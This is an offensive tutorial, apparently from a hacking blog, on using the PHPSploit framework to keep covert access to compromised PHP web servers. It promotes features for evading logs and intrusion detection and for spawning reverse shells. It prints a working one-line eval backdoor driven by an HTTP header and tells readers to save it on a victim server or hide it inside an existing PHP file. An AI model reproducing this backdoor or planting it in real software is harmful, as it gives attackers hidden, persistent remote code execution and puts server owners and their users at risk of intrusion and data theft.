Post Exploitation : Phpsploit Tutorial

Post Exploitation is the stage that comes after Exploitation, where tasks such as Maintaining Access and Privilege Escalation are carried out. In Web Hacking, most people use Web Shells for Post Exploitation. From inside the Web Shell, a Back Connect is used to get a Reverse Shell back to our own machine or VPS, and Privilege Escalation is done from there. This tutorial is written so that, instead of using Web Shells, you can use a Post Exploitation Framework called PHPSploit if you want to.

Download PHPsploit 

https://github.com/nil0x42/phpsploit

Features

Efficient: More than 20 plugins to automate post-exploitation tasks

Run commands and browse filesystem, bypassing PHP security restrictions
Upload/Download files between client and target
Edit remote files through local text editor
Run SQL console on target system
Spawn reverse TCP shells

Stealth: The framework is made by paranoids, for paranoids

Nearly invisible by log analysis and NIDS signature detection
Safe-mode and common PHP security restrictions bypass
Communications are hidden in HTTP Headers
Loaded payloads are obfuscated to bypass NIDS
http/https/socks4/socks5 Proxy support

Convenient: A robust interface with many crucial features

Cross-platform on both the client and the server.
Powerful interface with completion and multi-command support
Session saving/loading feature, with persistent history
Multi-request support for large payloads (such as uploads)
Provides a powerful, highly configurable settings engine
Each setting, such as user-agent has a polymorphic mode
Customisable environment variables for plugin interaction
Provides a complete plugin development API

Tiny Polymorphic Backdoor

Because the backdoor that has to be placed on the Victim side is so tiny, phpsploit is described as a Stealth Post Exploitation Framework. Another point is that, when leaving a Backdoor behind, this is nicer to use than leaving some RCE code, since it already comes with back connect built in.

Backdoor Code 

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

You can save this as script.php on the Victim side and try it out. Alternatively, if it is placed inside an existing php file, it can be used as a Backdoor.

Attacker Site

./phpsploit

Shell Session

Running Commands

run <command>

Enjoy !